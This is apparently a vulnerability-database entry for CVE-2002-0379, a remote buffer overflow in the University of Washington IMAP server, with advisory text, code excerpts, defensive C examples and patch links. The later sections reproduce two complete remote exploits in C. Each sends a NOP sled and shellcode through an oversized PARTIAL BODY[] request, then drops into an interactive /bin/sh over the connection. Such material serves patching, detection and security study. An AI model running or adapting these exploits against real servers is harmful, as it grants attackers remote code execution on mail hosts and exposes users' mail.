CVE-2002-0379
CVSS 7.5
Published: 2002-06-25 00:00:00
Revised: 2016-10-17 22:19:57
NMCOE    

[Original] Buffer overflow in University of Washington imap server (uw-imapd) imap-2001 (imapd 2001.315) and imap-2001a (imapd 2001.315) with legacy RFC 1730 support, and imapd 2000.287 and earlier, allows remote authenticated users to execute arbitrary code via a long BODY request.


[CNNVD] Wu-imapd Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (CNNVD-200206-092)

        
Wu-imapd is an IMAP (Internet Message Access Protocol) server implementation developed by Washington University for Linux and Unix systems.
Wu-imapd contains a flaw in its handling of requests for partial mailbox attributes that lets a remote attacker trigger a buffer overflow and execute arbitrary commands on the target system with the privileges of the imapd process.
An attacker can construct a malformed request for partial mailbox attributes that makes the server crash with a SIG11 (segmentation fault). The problem is in imapd.c:
imapd.c
-------
int main (int argc,char *argv[])
{
 unsigned long i,uid;
 long f;
 char *s,*t,*u,*v,tmp[MAILTMPLEN];
.
.
.
else if (!strncmp (t,"BODY[",5) && (v = strchr(t+5,']')) &&
!v[1]){
 strncpy (tmp,t+5,i = v - (t+5));
.
.
.
else if (!strncmp (t,"BODY.PEEK[",10) &&
 (v = strchr (t+10,']')) && !v[1]) {
 strncpy (tmp,t+10,i = v - (t+10));
.
.
.
-------
In both branches the copy length i is the distance from the opening bracket to the ']' in the client's request, and it is never compared against the size of tmp, a fixed MAILTMPLEN-byte local buffer. Processing a request such as A0666 PARTIAL 1 BODY[AAA...1052bytes..AAA] 1 1 therefore overflows the buffer; carefully constructed string data can lead to arbitrary command execution on the target system with the privileges of the imapd process.
This vulnerability only affects imapd builds with RFC 1730 support; in imapd 2001.313 and imap-2001.315 support for this RFC is not built in by default.
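The pattern in the excerpt above, as an added example that is not the page's or uw-imapd's own code: a scaled-down stand-in for the two BODY[ / BODY.PEEK[ branches that computes the copy length exactly as the excerpt does, next to a bounded version that refuses any section that does not fit the destination buffer. DEMO_TMPLEN is an assumed value standing in for MAILTMPLEN, the prefix parameter generalises the two hard-coded branches, and the 1052-byte request is constructed sample input in the shape the text describes.

```c
#include <stdio.h>
#include <string.h>

/* Stand-in for MAILTMPLEN (assumed value for this demo; the real constant
 * lives in the c-client headers and is not given on the page). */
#define DEMO_TMPLEN 1024

/* Copy length the excerpt computes for one branch: t must start with prefix
 * ("BODY[" or "BODY.PEEK["), contain a ']' and end right after it. Returns
 * the number of bytes between the brackets, or -1 if the syntax does not
 * match. This is the value the excerpt hands to strncpy without ever
 * comparing it against the size of tmp. */
long body_section_len(const char *t, const char *prefix)
{
    size_t plen = strlen(prefix);
    const char *v;

    if (strncmp(t, prefix, plen) != 0)
        return -1;
    v = strchr(t + plen, ']');
    if (v == NULL || v[1] != '\0')
        return -1;
    return (long)(v - (t + plen));
}

/* Bounded version: same parse, but the section is copied only if it fits in
 * tmp together with its terminating NUL. Returns the copied length, or -1
 * (copying nothing) when the syntax is wrong or the section is too long. */
long copy_body_section_checked(const char *t, const char *prefix,
                               char *tmp, size_t tmplen)
{
    long i = body_section_len(t, prefix);

    if (i < 0 || (size_t)i >= tmplen)
        return -1;
    memcpy(tmp, t + strlen(prefix), (size_t)i);
    tmp[i] = '\0';
    return i;
}

/* Builds the request shape the text describes, a BODY[...] section of 1052
 * bytes (constructed here as a run of 'A'), and reports whether the bounded
 * copy rejects it for a DEMO_TMPLEN-byte destination. */
int oversized_section_is_rejected(void)
{
    static char req[5 + 1052 + 2];
    static char tmp[DEMO_TMPLEN];

    memcpy(req, "BODY[", 5);
    memset(req + 5, 'A', 1052);
    req[5 + 1052] = ']';
    req[5 + 1052 + 1] = '\0';

    return body_section_len(req, "BODY[") == 1052
        && copy_body_section_checked(req, "BODY[", tmp, sizeof tmp) == -1;
}

int main(void)
{
    char tmp[DEMO_TMPLEN];

    printf("BODY[HEADER]      -> len %ld\n",
           body_section_len("BODY[HEADER]", "BODY["));
    printf("BODY.PEEK[1.2]    -> len %ld\n",
           body_section_len("BODY.PEEK[1.2]", "BODY.PEEK["));
    printf("1052-byte section -> rejected by bounded copy: %s\n",
           oversized_section_is_rejected() ? "yes" : "no");
    printf("BODY[1.2]         -> copied \"%s\"\n",
           copy_body_section_checked("BODY[1.2]", "BODY[", tmp, sizeof tmp) >= 0
               ? tmp : "(rejected)");
    return 0;
}
```

The unchecked length is deliberately returned rather than used for a copy, so the demo never performs the overflow itself; the bounded function is the shape of fix that a maintainer would apply, with the check sitting between the parse and the copy.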
To determine whether an imapd is vulnerable, run imapd and issue "x capability"; the output looks like the following. A vulnerable server lists the bare IMAP4 capability (legacy RFC 1730 support) alongside IMAP4REV1; a server without that support lists only IMAP4REV1.
The following exchange indicates a vulnerable server (stop the imapd service first):
 * PREAUTH .....
 x capability
 * CAPABILITY IMAP4 IMAP4REV1 ...
 x OK CAPABILITY completed

The following exchange indicates a server that is not vulnerable:
 * PREAUTH .....
 x capability
 * CAPABILITY IMAP4REV1 ...
 x OK CAPABILITY completed
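The capability check above, as an added example that is not the page's code: a small C routine that finds the untagged CAPABILITY line in a server response and reports whether it lists the bare IMAP4 capability, comparing whole tokens so that IMAP4REV1 on its own does not count (a plain substring search for "IMAP4" would match it). The two responses it runs on are constructed samples in the shape of the exchanges shown, with the elided capabilities replaced by a placeholder token named OTHER.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Case-insensitive, whole-token comparison of the len-byte token at tok
 * against the NUL-terminated capability name. */
static int token_is(const char *tok, size_t len, const char *name)
{
    size_t i;

    if (strlen(name) != len)
        return 0;
    for (i = 0; i < len; i++)
        if (toupper((unsigned char)tok[i]) != toupper((unsigned char)name[i]))
            return 0;
    return 1;
}

/* Scans a raw server response (one or more CRLF- or LF-terminated lines) for
 * the untagged "* CAPABILITY" reply. Returns 1 if that line lists the bare
 * "IMAP4" capability, 0 if it does not, and -1 if no CAPABILITY line is
 * present. Tokens are matched whole, so "IMAP4REV1" is not a match. */
int capability_advertises_legacy_imap4(const char *resp)
{
    static const char tag[] = "* CAPABILITY ";
    const size_t taglen = sizeof tag - 1;
    const char *line = resp;

    while (*line != '\0') {
        const char *end = strpbrk(line, "\r\n");
        const char *stop = end ? end : line + strlen(line);

        if ((size_t)(stop - line) >= taglen && strncmp(line, tag, taglen) == 0) {
            const char *p = line + taglen;
            int found = 0;

            while (p < stop) {
                const char *tok = p;
                while (p < stop && *p != ' ')
                    p++;
                if (token_is(tok, (size_t)(p - tok), "IMAP4"))
                    found = 1;
                while (p < stop && *p == ' ')
                    p++;
            }
            return found;
        }
        if (end == NULL)
            break;
        line = end;
        while (*line == '\r' || *line == '\n')
            line++;
    }
    return -1;
}

/* Constructed sample responses in the shape of the two exchanges on the page;
 * OTHER stands for the capabilities the page elides with "...". */
static const char RESP_VULNERABLE[] =
    "* PREAUTH constructed sample banner\r\n"
    "* CAPABILITY IMAP4 IMAP4REV1 OTHER\r\n"
    "x OK CAPABILITY completed\r\n";

static const char RESP_NOT_VULNERABLE[] =
    "* PREAUTH constructed sample banner\r\n"
    "* CAPABILITY IMAP4REV1 OTHER\r\n"
    "x OK CAPABILITY completed\r\n";

int main(void)
{
    printf("sample 1: legacy IMAP4 advertised = %d\n",
           capability_advertises_legacy_imap4(RESP_VULNERABLE));
    printf("sample 2: legacy IMAP4 advertised = %d\n",
           capability_advertises_legacy_imap4(RESP_NOT_VULNERABLE));
    return 0;
}
```

Feeding it the text captured from a real "x capability" exchange (for instance from an inventory script run against your own mail hosts) gives a yes/no answer that does not depend on eyeballing the line; the -1 result flags a response that never contained a CAPABILITY reply at all.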
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:university_of_washington:uw-imap:2000.284
cpe:/a:university_of_washington:uw-imap:2000.315
cpe:/a:university_of_washington:uw-imap:2000.287
cpe:/a:university_of_washington:uw-imap:2000.283

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0379
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0379
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200206-092
(official data source) CNNVD

- Other links and resources

ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2002-021.0.txt
(UNKNOWN)  CALDERA  CSSA-2002-021.0
http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000487
(UNKNOWN)  CONECTIVA  CLA-2002:487
http://marc.info/?l=bugtraq&m=102107222100529&w=2
(UNKNOWN)  BUGTRAQ  20020510 wu-imap buffer overflow condition
http://online.securityfocus.com/advisories/4167
(UNKNOWN)  HP  HPSBTL0205-043
http://www.iss.net/security_center/static/9055.php
(UNKNOWN)  XF  wuimapd-partial-mailbox-bo(9055)
http://www.kb.cert.org/vuls/id/961489
(UNKNOWN)  CERT-VN  VU#961489
http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-034.php
(UNKNOWN)  MANDRAKE  MDKSA-2002:034
http://www.linuxsecurity.com/advisories/other_advisory-2120.html
(UNKNOWN)  ENGARDE  ESA-20020607-013
http://www.redhat.com/support/errata/RHSA-2002-092.html
(UNKNOWN)  REDHAT  RHSA-2002:092
http://www.securityfocus.com/bid/4713
(UNKNOWN)  BID  4713
http://www.washington.edu/imap/buffer.html
(UNKNOWN)  CONFIRM  http://www.washington.edu/imap/buffer.html
http://xforce.iss.net/xforce/xfdb/10803
(UNKNOWN)  XF  wuimapd-authenticated-user-bo(10803)

- Vulnerability Information

Wu-imapd Partial Mailbox Attribute Remote Buffer Overflow Vulnerability
High risk  Boundary condition error
2002-06-25 00:00:00 2007-02-07 00:00:00
Remote
        
        

- Advisories and patches

Vendor patches:
Caldera
-------
Caldera has released a security advisory (CSSA-2002-021.0) and corresponding patches for this issue:
CSSA-2002-021.0:Linux: imapd buffer overflow when fetching partial mailbox attributes
Link:
        http://www.caldera.com/support/security/advisories/CSSA-2002-021.0.txt

Patch download:
        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/current/RPMS
        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/current/RPMS
        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/RPMS
        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/RPMS
Patch installation:
        # rpm -Fvh package_name
        Conectiva
        ---------
Conectiva has released a security advisory (CLA-2002:487) and corresponding patches for this issue:
CLA-2002:487:imap
Link:
        http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000487

Patch download:
        ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/imap-2000c-10U60_3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/imap-2000c-10U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/imap-devel-2000c-10U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/imap-devel-static-2000c-10U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/imap-doc-2000c-10U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/imap-2000c-10U70_3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/imap-2000c-10U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/imap-devel-2000c-10U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/imap-devel-static-2000c-10U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/imap-doc-2000c-10U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/SRPMS/imap-2000c-12U8_2cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/imap-2000c-12U8_2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/imap-devel-2000c-12U8_2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/imap-devel-static-2000c-12U8_2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/imap-doc-2000c-12U8_2cl.i386.rpm
Users of Conectiva Linux 6.0 and later can update the RPM packages with apt:
- Add the following line to /etc/apt/sources.list:

rpm [cncbr] ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates
(If you are not running version 6.0, replace the 6.0 above with the appropriate version number)
- Run: apt-get update
- After updating, run: apt-get upgrade
        MandrakeSoft
        ------------
MandrakeSoft has released a security advisory (MDKSA-2002:034) and corresponding patches for this issue:
MDKSA-2002:034:imap
Link:
        http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-034.php

Patch download:
        Updated Packages:
        Linux-Mandrake 7.1:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/RPMS/imap-2000c-4.9mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/RPMS/imap-devel-2000c-4.9mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/SRPMS/imap-2000c-4.9mdk.src.rpm
        Linux-Mandrake 7.2:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/RPMS/imap-2000c-4.8mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/RPMS/imap-devel-2000c-4.8mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/SRPMS/imap-2000c-4.8mdk.src.rpm
        Mandrake Linux 8.0:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/RPMS/imap-2000c-4.7mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/RPMS/imap-devel-2000c-4.7mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/SRPMS/imap-2000c-4.7mdk.src.rpm
        Mandrake Linux 8.0/ppc:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/RPMS/imap-2000c-4.7mdk.ppc.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/RPMS/imap-devel-2000c-4.7mdk.ppc.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/SRPMS/imap-2000c-4.7mdk.src.rpm
        Mandrake Linux 8.1:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/imap-2000c-7.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/

- Vulnerability Information (21442)

Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (1) (EDBID:21442)
linux remote
2002-05-10 Verified
0 korty
N/A
source: http://www.securityfocus.com/bid/4713/info

Wu-imapd is vulnerable to a buffer overflow condition. This has been reported to occur when a valid user requests partial mailbox attributes. Exploitation may result in the execution of arbitrary code as the server process. An attacker may also be able to crash the server, resulting in a denial of service condition.

This only affects versions of imapd with legacy RFC 1730 support, which is disabled by default in imapd 2001.313 and imap-2001.315. 

/*
 * http://www.freeweb.nu/mantra/05_2002/uw-imapd.html
 *
 * uw-imapd.c - Remote exploit for uw imapd CAPABILITY IMAP4
 *
 * Copyright (C) 2002  Christophe "korty" Bailleux <cb@t-online.fr>
 * Copyright (C) 2002  Kostya Kortchinsky <kostya.kortchinsky@renater.fr>
 *
 * All Rights Reserved
 * The copyright notice above does not evidence any
 * actual or intended publication of such source code.
 *
 * Usage: ./wu-imap host user password shellcode_addressr alignement
 *
 * Demonstration values for Linux:
 *
 * (slackware 7.1) ./uw-imap localhost test test1234 0xbffffa60 0
 * (Redhat 7.2)    ./uw-imap localhost test test1234 0xbffff760 0
 *
 * THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER
 *
 * The code is dirty...but we like dirty things :)
 * And it works very well :)
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include  <sys/types.h>
#include  <sys/socket.h>
#include  <netinet/in.h>
#include  <stdio.h>
#include  <string.h>
#include  <netdb.h>

#define GOOD_EXIT    0
#define ERROR_EXIT    1

#define DEFAULT_PROTOCOL  0
#define SEND_FLAGS    0
#define RECV_FLAGS    0

char sc[]=
"\xeb\x38"                      /* jmp 0x38              */
"\x5e"                          /* popl %esi             */
"\x80\x46\x01\x50"              /* addb $0x50,0x1(%esi)  */
"\x80\x46\x02\x50"              /* addb $0x50,0x2(%esi)  */
"\x80\x46\x03\x50"              /* addb $0x50,0x3(%esi)  */
"\x80\x46\x05\x50"              /* addb $0x50,0x5(%esi)  */
"\x80\x46\x06\x50"              /* addb $0x50,0x6(%esi)  */
"\x89\xf0"                      /* movl %esi,%eax        */
"\x83\xc0\x08"                  /* addl $0x8,%eax        */
"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
"\x31\xc0"                      /* xorl %eax,%eax        */
"\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
"\xb0\x0b"                      /* movb $0xb,%al         */
"\x89\xf3"                      /* movl %esi,%ebx        */
"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
"\xcd\x80"                      /* int $0x80             */
"\x31\xdb"                      /* xorl %ebx,%ebx        */
"\x89\xd8"                      /* movl %ebx,%eax        */
"\x40"                          /* inc %eax              */
"\xcd\x80"                      /* int $0x80             */
"\xe8\xc3\xff\xff\xff"          /* call -0x3d            */
"\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh"     */

int imap_send(int s, char *buffer)
{
  int result = GOOD_EXIT;

  if (send(s, buffer, strlen(buffer), SEND_FLAGS) < 0)
    result = ERROR_EXIT;

  return result;
}

int imap_receive(int s, char *buffer, int size)
{
  int result = GOOD_EXIT;
  int char_recv;
  int tot_recv = 0;

  bzero(buffer, size);
  do {
    char_recv = recv(s, &buffer[tot_recv], size - tot_recv, RECV_FLAGS);
    if (char_recv > 0)
      tot_recv += char_recv;
  } while ((char_recv > 0) && (strchr(buffer, 13) == NULL));

  if (char_recv < 0)
    result = ERROR_EXIT;

  return result;
}

#define BANNER "pwd ; uname -a"

int interact( int fd )
{
     fd_set fds;
     ssize_t ssize;
     char buffer[ 666 ];

   write( fd, BANNER"\n", sizeof(BANNER) );
     while ( 12 != 42 ) {
           FD_ZERO( &fds );
           FD_SET( STDIN_FILENO, &fds );
           FD_SET( fd, &fds);
           select( fd + 1, &fds, NULL, NULL, NULL );

           if ( FD_ISSET(STDIN_FILENO, &fds) ) {
              ssize = read( STDIN_FILENO, buffer, sizeof(buffer) );
              if ( ssize < 0 ) {
                 return( -1 );
              }
              if ( ssize == 0 ) {
                 return( 0 );
              }

              write( fd, buffer, ssize );

           }

           if ( FD_ISSET(fd, &fds) ) {
               ssize = read( fd, buffer, sizeof(buffer) );
               if ( ssize < 0 ) {
                  return( -1 );
                }
               if ( ssize == 0 ) {
                  return( 0 );
               }

               write( STDOUT_FILENO, buffer, ssize );

           }
     }
     return( -1 );
 }


void usage(char *cmd)
{
  printf("Usage: %s host user pass shellcode_addr align\n", cmd);
  printf("Demo: %s localhost test test1234 0xbffffa40 0\n", cmd);
  exit(0);
}


int main(int argc, char *argv[])
{
  struct sockaddr_in server;
  struct servent *sp;
  struct hostent *hp;
  int s, i , ret, align;
  int blaw = 1024;
  char *user, *passwd;

  char imap_info[4096];
  char imap_login[4096];
  char imap_query[4096];
  char buffer[2048];

  int exit_code = GOOD_EXIT;

  if (argc != 6) usage(argv[0]);

  user = argv[2];
  passwd = argv[3];
  ret = strtoul(argv[4], NULL, 16);
  align = atoi(argv[5]);

  if ((hp = gethostbyname(argv[1])) == NULL)
    exit_code = ERROR_EXIT;

  if ((exit_code == GOOD_EXIT) && (sp = getservbyname("imap2", "tcp")) ==
NULL)
    exit_code = ERROR_EXIT;

  if (exit_code == GOOD_EXIT) {
    if ((s = socket(PF_INET, SOCK_STREAM, DEFAULT_PROTOCOL)) < 0)
      return exit_code = ERROR_EXIT;

    bzero((char *) &server, sizeof(server));
    bcopy(hp->h_addr, (char *) &server.sin_addr, hp->h_length);
    server.sin_family = hp->h_addrtype;
    server.sin_port = sp->s_port;
    if (connect(s, (struct sockaddr *) &server, sizeof(server)) < 0)
      exit_code = ERROR_EXIT;
    else {
      printf("\033[1;34mVérification de la bannière : \033[0m\n");
      if (exit_code = imap_receive(s, imap_info, sizeof(imap_info)) ==
ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      printf("%s", imap_info);
      if (strstr(imap_info, "IMAP4rev1 200") == NULL) {
        printf("\033[1;32mService IMAPd non reconnu ... \033[0m\n");
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      if ((exit_code = imap_send(s, "x CAPABILITY\n")) == ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      printf("\033[1;34mVérification des options du service : \033[0m\n");
      if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      printf("%s", imap_info);
      if (strstr(imap_info, " IMAP4 ") == NULL) {
        printf("\033[1;32mService IMAPd non vulnérable ... \033[0m\n");
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      printf("\033[1;31mService IMAPd vulnérable ... \033[0m\n");
      sprintf(imap_login, "x LOGIN %s %s\n", user, passwd);
      if ((exit_code = imap_send(s, imap_login)) == ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }
      printf("%s", imap_info);

      if ((exit_code = imap_send(s, "x SELECT Inbox\n")) == ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }
      printf("%s", imap_info);

      memset(buffer, 0x90, sizeof(buffer));
      memcpy(buffer + 512, sc, strlen(sc));

      for (i = blaw + align ; i < 1096; i +=4)
        *(unsigned int *)(&buffer[i]) = ret;

      *(unsigned int *)(&buffer[i + 1]) = 0;

      sprintf(imap_query, "x PARTIAL 1 BODY[%s] 1 1\n", buffer);
      if ((exit_code = imap_send(s, imap_query)) == ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      if ((exit_code = imap_send(s, "x LOGOUT\n")) == ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }
    }
  }

      i = interact( s );

  return exit_code;
}
		

- Vulnerability Information (21443)

Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (2) (EDBID:21443)
linux remote
2002-05-10 Verified
0 0x3a0x29 crew
N/A
source: http://www.securityfocus.com/bid/4713/info
 
Wu-imapd is vulnerable to a buffer overflow condition. This has been reported to occur when a valid user requests partial mailbox attributes. Exploitation may result in the execution of arbitrary code as the server process. An attacker may also be able to crash the server, resulting in a denial of service condition.
 
This only affects versions of imapd with legacy RFC 1730 support, which is disabled by default in imapd 2001.313 and imap-2001.315.

/*
 * 0x3a0x29wuim.c - WU-IMAP 2000.287 (linux/i86) remote exploit
 *
 * dekadish
 *
 *  0x3a0x29 crew
 *
 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define RETADDR 0x080eb395 /* My Debian 2.2 box */
#define MAILDIR "/var/spool/mail"

char shellcode[] =
 "\x55\x89\xe5\x55\x89\xe5\x83\xec\x28\xc6\x45\xd8\x2f\xc6\x45\xdc"
 "\x2f\xc6\x45\xd9\x5f\xc6\x45\xda\x5a\xc6\x45\xdb\x5f\xc6\x45\xdd"
 "\x5f\xc6\x45\xde\x5f\x83\x45\xd9\x03\x83\x45\xda\x0f\x83\x45\xdb"
 "\x0f\x83\x45\xdd\x14\x83\x45\xde\x09\x31\xc0\x89\x45\xdf\x89\x45"
 "\xf4\x8d\x45\xd8\x89\x45\xf0\x83\xec\x04\x8d\x45\xf0\x31\xd2\x89"
 "\xd3\x89\xc1\x8b\x45\xf0\x89\xc3\x31\xc0\x83\xc0\x0b\xcd\x80\x31"
 "\xc0\x40\xcd\x80";

int main(int argc, char *argv[])
{
	int s, i;
	fd_set fds;
	char tmp[2048], buf[1060];
	char *target, *login, *pass, *p;
	struct sockaddr_in sock;
	unsigned long retaddr;

	fprintf(stderr, "%s\n", "[The #smile Crew]");
	if (argc != 4)
	{
		fprintf(stderr, "Usage: %s <Target ip> <Login> <Password>\n", argv[0]);
		exit(-1);
	}

	retaddr = RETADDR;
	target  = argv[1];
	login   = argv[2];
	pass    = argv[3];

	s = socket(AF_INET, SOCK_STREAM, 0);
	sock.sin_port = htons(143);
	sock.sin_family = AF_INET;
	sock.sin_addr.s_addr = inet_addr(target);

	printf("\nConnecting to %s:143...", target);
	fflush(stdout);
	if ((connect(s, (struct sockaddr *)&sock, sizeof(sock))) < 0)
	{
		printf("failed\n");
		exit(-1);
	}
	else
		recv(s, tmp, sizeof(tmp), 0);

	printf("done\nLogging in...");
	fflush(stdout);
	snprintf(tmp, sizeof(tmp), "A0666 LOGIN %s %s\n", login, pass);
	send(s, tmp, strlen(tmp), 0);
	recv(s, tmp, sizeof(tmp), 0);

	if (!strstr(tmp, "completed"))
	{
		printf("failed\n");
		exit(-1);
	}

	printf("done\nExploiting...");
	fflush(stdout);

	dprintf(s, "A0666 SELECT %s/%s\n", MAILDIR, login);

	memset(buf, 0x0, sizeof(buf));
	p = buf;
	memset(p, 0x90, 928);
	p += 928;
	memcpy(p, shellcode, 100);
	p += 100;

	for (i=0; i<6; i++)
	{
		memcpy(p, &retaddr, 0x4);
		p += 0x4;
	}

	snprintf(tmp, sizeof(tmp), "A0666 PARTIAL 1 BODY[%s] 1 1\n", buf);
	send(s, tmp, strlen(tmp), 0);
	dprintf(s, "A0666 LOGOUT\n");
	sleep(5);
	printf("done\n\n");

	read(s, tmp, sizeof(tmp));
	dprintf(s, "uname -a;id;\n");
	memset(tmp, 0x0, sizeof(tmp));

	while (1)
	{
		FD_ZERO(&fds);
		FD_SET(s, &fds);
		FD_SET(1, &fds);

		select((s+1), &fds, 0, 0, 0);

		if (FD_ISSET(s, &fds))
		{
			if ((i = recv(s, tmp, sizeof(tmp), 0)) < 1)
			{
				fprintf(stderr, "Connection closed\n");
				exit(0);
			}
			write(0, tmp, i);
		}
		if (FD_ISSET(1, &fds))
		{
			i = read(1, tmp, sizeof(tmp));
			send(s, tmp, i, 0);
		}
	}

	return 0; /* unreachable after the while (1) loop, but main returns int */
}
		

- Vulnerability Information

790
UoW imap Server (uw-imapd) BODY Request Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability Description

- Timeline

2002-05-10 Unknown
2002-05-10 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability Author

Unknown or Incomplete
 

 
